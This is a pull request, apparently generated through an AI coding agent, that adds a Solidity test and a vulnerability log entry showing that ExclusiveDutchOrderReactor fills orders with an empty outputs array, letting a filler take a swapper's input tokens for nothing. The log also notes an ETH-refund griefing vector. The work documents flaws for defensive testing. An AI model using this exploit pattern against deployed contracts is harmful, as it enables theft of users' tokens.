### PR TITLE
Add zero outputs exploit test for ExclusiveDutchOrder

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -117,6 +117,11 @@ We tested whether invoking `OrderQuoter.quote` with a fully signed order could t
 - **Result:** Order executes successfully, transferring the swapper's input tokens to the filler without providing any output tokens. The absence of validation allows trivial token theft.
 - **Status:** **Bug discovered** – see `testExecuteNoOutputs` in `PriorityOrderReactorZeroOutputs.t.sol`.
 
+## Exclusive Dutch Order With No Outputs
+- **Vector:** Execute an `ExclusiveDutchOrder` where the `outputs` array is empty.
+- **Result:** Order executes successfully, transferring the swapper's input tokens to the filler without providing any output tokens. The absence of validation allows trivial token theft.
+- **Status:** **Bug discovered** – see `testExecuteNoOutputs` in `ExclusiveDutchOrderReactorZeroOutputs.t.sol`.
+
 
 ## Leftover ETH refund to non-payable filler
 - **Description**: The reactor refunds any ETH balance to the filler after execution. If the filler contract refuses ETH, this refund reverts and halts order execution. An attacker can send ETH to the reactor to block such fillers.

--- a/snapshots/ExclusiveDutchOrderReactorZeroOutputsTest.json
+++ b/snapshots/ExclusiveDutchOrderReactorZeroOutputsTest.json
@@ -1,0 +1,11 @@
+{
+  "BaseExecuteSingleWithFee": "172197",
+  "ExecuteBatch": "180978",
+  "ExecuteBatchMultipleOutputs": "190309",
+  "ExecuteBatchMultipleOutputsDifferentTokens": "243543",
+  "ExecuteBatchNativeOutput": "177018",
+  "ExecuteSingle": "138932",
+  "ExecuteSingleNativeOutput": "127001",
+  "ExecuteSingleValidation": "147930",
+  "RevertInvalidNonce": "18704"
+}

--- a/test/reactors/ExclusiveDutchOrderReactorZeroOutputs.t.sol
+++ b/test/reactors/ExclusiveDutchOrderReactorZeroOutputs.t.sol
@@ -1,0 +1,30 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity ^0.8.0;
+
+import {ExclusiveDutchOrderReactorTest} from "./ExclusiveDutchOrderReactor.t.sol";
+import {ExclusiveDutchOrder, DutchInput, DutchOutput} from "../../src/reactors/ExclusiveDutchOrderReactor.sol";
+import {SignedOrder, OrderInfo} from "../../src/base/ReactorStructs.sol";
+import {OrderInfoBuilder} from "../util/OrderInfoBuilder.sol";
+
+contract ExclusiveDutchOrderReactorZeroOutputsTest is ExclusiveDutchOrderReactorTest {
+    using OrderInfoBuilder for OrderInfo;
+
+    function testExecuteNoOutputs() public {
+        tokenIn.mint(address(swapper), ONE);
+        tokenIn.forceApprove(swapper, address(permit2), ONE);
+        ExclusiveDutchOrder memory order = ExclusiveDutchOrder({
+            info: OrderInfoBuilder.init(address(reactor)).withSwapper(swapper),
+            decayStartTime: block.timestamp,
+            decayEndTime: block.timestamp,
+            exclusiveFiller: address(0),
+            exclusivityOverrideBps: 300,
+            input: DutchInput(tokenIn, ONE, ONE),
+            outputs: new DutchOutput[](0)
+        });
+        bytes memory sig = signOrder(swapperPrivateKey, address(permit2), order);
+        fillContract.execute(SignedOrder(abi.encode(order), sig));
+        assertEq(tokenIn.balanceOf(address(swapper)), 0);
+        assertEq(tokenIn.balanceOf(address(fillContract)), ONE);
+        assertEq(tokenOut.balanceOf(address(swapper)), 0);
+    }
+}


### PR DESCRIPTION
## Summary
- test ExclusiveDutchOrderReactor allows empty outputs
- document the vulnerability in TestedVectors

## Testing
- `forge test --match-path test/reactors/ExclusiveDutchOrderReactorZeroOutputs.t.sol -vvv`


------
https://chatgpt.com/codex/tasks/task_e_688ace2dc1c0832d989b5c8f41269a93